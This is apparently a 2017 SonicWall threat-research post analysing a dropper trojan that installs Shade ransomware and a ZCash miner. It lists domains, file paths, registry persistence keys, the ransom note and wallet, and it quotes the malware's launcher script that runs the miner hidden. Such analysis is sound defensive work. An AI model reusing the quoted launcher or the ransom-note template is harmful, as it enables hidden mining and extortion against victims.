Dropper trojan delivers Shade ransomware and ZCash crypto miner (Sep 1st, 2017)
The SonicWall Capture Labs Threat Research Team have observed a dropper Trojan that drops ransomware as well as crypto miner software. In this case, a variant of the Shade ransomware is dropped and a crypto coin miner that mines ZCash (ZEC).
Infection Cycle:
The Trojan makes the following DNS queries:
- global-genom.com
- webroshd.com
- whatismyipaddress.com
- whatsmyip.net
- eu1-zcash.flypool.org
The Trojan drops the following files on to the filesystem:
- %ALLUSERSPROFILE%Application DataSoftwareDistribution nheqminer32.exe
- %ALLUSERSPROFILE%Application DataSysWOW64D8pedj.cmd
- %ALLUSERSPROFILE%Application DataWindowscsrss.exe [Detected as GAV: Shade.RSM_5 (Trojan)]
- %ALLUSERSPROFILE%DesktopREADME{1 to 10}.txt
- %APPDATA%CF4ED5F2CF4ED5F2.bmp
- %TEMP%FA375141.rtf
The Trojan adds the following keys to the registry:
- HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Command Line Support “cmd.exe /C C:DOCUME~1ALLUSE~1APPLIC~1SysWOW64D8pedj.cmd”
- HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Client Server Runtime Subsystem “”C:Documents and SettingsAll UsersApplication DataWindowscsrss.exe””
D8pedj.cmd contains the following script which starts:
echo CreateObject("Wscript.Shell").Run ""^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/QYHz1.vbs"&& start /WAIT wscript.exe "%TEMP%/QYHz1.vbs" "C:DOCUME~1ALLUSE~1APPLIC~1SOFTWA~1NHEQMI~1.EXE -l eu1-zcash.flypool.org:3333 -ut1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.FA0F586A -t 1" && del "%TEMP%QYHz1.vbs"README{1 to 10}.txt contains the following text:
All the important files on your computer were encrypted.To decrypt the files you should send the following code:0E7F1123D9BE734AF274|0to e-mail address gervasiy.menyaev@gmail.com.Then you will receive all necessary instructions.All the attempts of decryption by yourself will result only in irrevocable loss of your data.If you still want to try to decrypt them by yourself please make a backup at first becausethe decryption will become impossible in case of any changes inside the files.If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),use the feedback form. You can do it by two ways:1) Download Tor Browser from here:https://www.torproject.org/download/download-easy.html.enInstall it and type the following address into the address bar:http://cryptsen7fo43rr6.onion/Press Enter and then the page with feedback form will be loaded.2) Go to the one of the following addresses in any browser:http://cryptsen7fo43rr6.onion.to/http://cryptsen7fo43rr6.onion.cab/The Trojan contacts whatsmyip.net to obtain the machines external IP address:
The Trojan downloads the Shade ransomware binary, document_082017_6401df.exe [Detected as GAV: Shade.RSM_5 (Trojan)]:
Once executed, it displays CF4ED5F2CF4ED5F2.bmp on the desktop background:
It also displays the following russian text file: FA375141.rtf
The Trojan encrypts files on the system and renames them to {encrypted filename}.crypted000007.
In addition to ransomware, a crypto miner is also dropped onto the system. Rather than mining Bitcoin, it mines ZCash (ZEC) which is worth $283/ZEC USD at the time of writing. nheqminer32.exe can be seen running in the process list:
The address accumulating the rewards is t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep. Mining activity can be observed by visiting the zcash.flypool.org website:
SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:
- GAV: Dropper.RSM_6 (Trojan)
- GAV: Shade.RSM_5 (Trojan)
